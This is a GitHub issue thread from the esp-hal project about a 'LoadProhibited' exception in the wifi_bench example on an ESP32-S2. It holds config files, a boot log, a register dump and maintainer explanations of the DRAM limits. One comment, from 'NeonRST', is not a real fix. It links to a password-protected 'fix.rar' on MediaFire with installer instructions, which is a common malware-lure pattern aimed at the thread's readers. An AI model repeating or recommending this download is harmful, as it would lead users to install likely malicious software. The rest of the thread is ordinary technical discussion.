esp-rs/esp-hal #2001: Example "wifi_bench" triggered an Exception on ESP32S2FH4 (No Embedded PSRAM)

wuwbobo2021, 2024-08-26:
I've made a simpler test program for locating the problem: It's runnable with 16KB memory usage of arrays (PS: the speed is always less than 100KB/s, I'd like to see the typical test result of `wifi_bench`, which is missing in the document), but 32KB of buffers causes the exception ('LoadProhibited', EXCVADDR = 0).

I'd like to port the code provided in `https://github.com/esp-rs/esp-hal/pull/1646` to ESP32-S2 to capture raw data (not from camera). But this memory-related issue may force me to come back to ESP-IDF and write in C. Where's the memory safety promised by Rust?

In ESP-IDF, `esp_get_minimum_free_heap_size()` returns about 250KB in `hello_world`, and it's about 130KB in another example with wifi enabled, still enough for my use case. In this project, it seems like the author of `esp-hal/ld/esp32s2/memory.x` thought that the size of DRAM is only 188KB, why?

My test crate is created by `cargo-generate`, the template is `https://github.com/esp-rs/esp-template`. I always use the release profile to build any program based on `esp-hal`.

`config.toml`:
```
[target.xtensa-esp32s2-none-elf]
runner = "espflash flash --monitor"

[env]
ESP_LOGLEVEL="INFO"

[build]
rustflags = [
  "-C", "link-arg=-nostartfiles",
]

target = "xtensa-esp32s2-none-elf"

[unstable]
build-std = ["alloc", "core"]
```

`Cargo.toml`:
```
[package]
name = "esp32-s2-pico-check"
version = "0.1.0"
authors = ["di945"]
edition = "2021"
license = "MIT OR Apache-2.0"

[dependencies]
esp-backtrace = { version = "0.13.0", features = [
    "esp32s2",
    "exception-handler",
    "panic-handler",
    "println",
] }
esp-hal = { version = "0.19.0", features = [ "esp32s2" ] }
esp-println = { version = "0.10.0", features = ["esp32s2", "log"] }
log = { version = "0.4.21" }
embedded-io = "0.6.1"
esp-wifi = { version = "0.7.1", features = [
    "esp32s2",
    #"phy-enable-usb",
    "utils",
    "wifi",
    "wifi-default",
] }
heapless = { version = "0.8.0", default-features = false }
smoltcp = { version = "0.11.0", default-features = false, features = [
    "medium-ethernet",
    "proto-dhcpv4",
    "proto-igmp",
    "proto-ipv4",
    "socket-dhcpv4",
    "socket-icmp",
    "socket-raw",
    "socket-tcp",
    #"socket-udp",
] }
#usb-device = "0.3.2"

[profile.dev]
# Rust debug is too slow.
[... 356 lines cut ...]
<0x1b>[0;32mI (118) esp_image: segment 2: paddr=000230a4 vaddr=3ffde3fc size=00150h (   336) load<0x1b>[0m
<0x1b>[0;32mI (123) esp_image: segment 3: paddr=000231fc vaddr=40022000 size=0a508h ( 42248) load<0x1b>[0m
<0x1b>[0;32mI (145) esp_image: segment 4: paddr=0002d70c vaddr=00000000 size=0290ch ( 10508) <0x1b>[0m
<0x1b>[0;32mI (148) esp_image: segment 5: paddr=00030020 vaddr=40080020 size=4f6fch (325372) map<0x1b>[0m
<0x1b>[0;32mI (243) boot: Loaded app from partition at offset 0x10000<0x1b>[0m
<0x1b>[0;32mI (243) boot: Disabling RNG early entropy source...<0x1b>[0m
<0x1b>[32mINFO - esp-wifi configuration Config { rx_queue_size: 5, tx_queue_size: 3, static_rx_buf_num: 10, dynamic_rx_buf_num: 32, static_tx_buf_num: 0, dynamic_tx_buf_num: 32, ampdu_rx_enable: 0, ampdu_tx_enable: 0, amsdu_tx_enable: 0, rx_ba_win: 6, max_burst_size: 1, country_code: "CN", country_code_operating_class: 0, mtu: 1492, heap_size: 65536, tick_rate_hz: 100, listen_interval: 3, beacon_timeout: 6, ap_beacon_timeout: 300, failure_retry_cnt: 1, scan_method: 0 }<0x1b>[0m
<0x1b>[31m

Exception occured 'LoadProhibited'
Context
PC=0x40022a8e       PS=0x00060930
A0=0x800a6024       A1=0x3ffdde60       A2=0x00000001       A3=0x000f5d6e       A4=0x00000001
A5=0x3ffc5434       A6=0x3f423038       A7=0x00000000       A8=0x00000000       A9=0x00000000
A10=0x00000000      A11=0x00000000      A12=0xffffffff      A13=0x00000000      A14=0x3ffda79c
A15=0x00000004
SAR=00000001
EXCCAUSE=0x0000001c EXCVADDR=0x00000000
LBEG=0x00000000     LEND=0x00000000     LCOUNT=0x00000000
THREADPTR=0x00000000
SCOMPARE1=0x00000000
BR=0x00000000
ACCLO=0x00000000    ACCHI=0x00000000
M0=0x00000000       M1=0x00000000       M2=0x00000000       M3=0x00000000
```

NeonRST, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

bjoernQ, 2024-08-27:
Thanks for opening this issue!

> In this project, it seems like the author of esp-hal/ld/esp32s2/memory.x thought that the size of DRAM is only 188KB, why? Is it related to IRAM usage?

There is a memory area we are not allowed to touch: the RAM used by ROM functions
Additionally, there is some memory where the 2nd stage bootloader resides during boot. While we could reclaim that memory as soon as the firmware is started, we cannot load code or data there (Related #1084)

For most chips IRAM and DRAM is the same physical memory mapped to different addresses - so the memory is shared by code and data

The exception is most probably caused by the stack growing into a region occupied by data/code

MabezDev, 2024-08-27:
I agree with @bjoernQ, I don't think this is a bug perse, but more of an artifact of the fact we're not making the full amount of memory available to users, lets track this in #1084 and close this for now.

closed 2024-08-27 by MabezDev

wuwbobo2021, 2024-09-15:
Thanks to <https://github.com/esp-rs/esp-hal/pull/2079>, I was able to run this example without any modification on my hardware. The download speed is about 150KB/s, upload speed is about 250KB/s. Strangely, the IDF `iperf` example running on the same hardware is more than 10 times faster. I’d like to see a typical result of `wifi_bench`.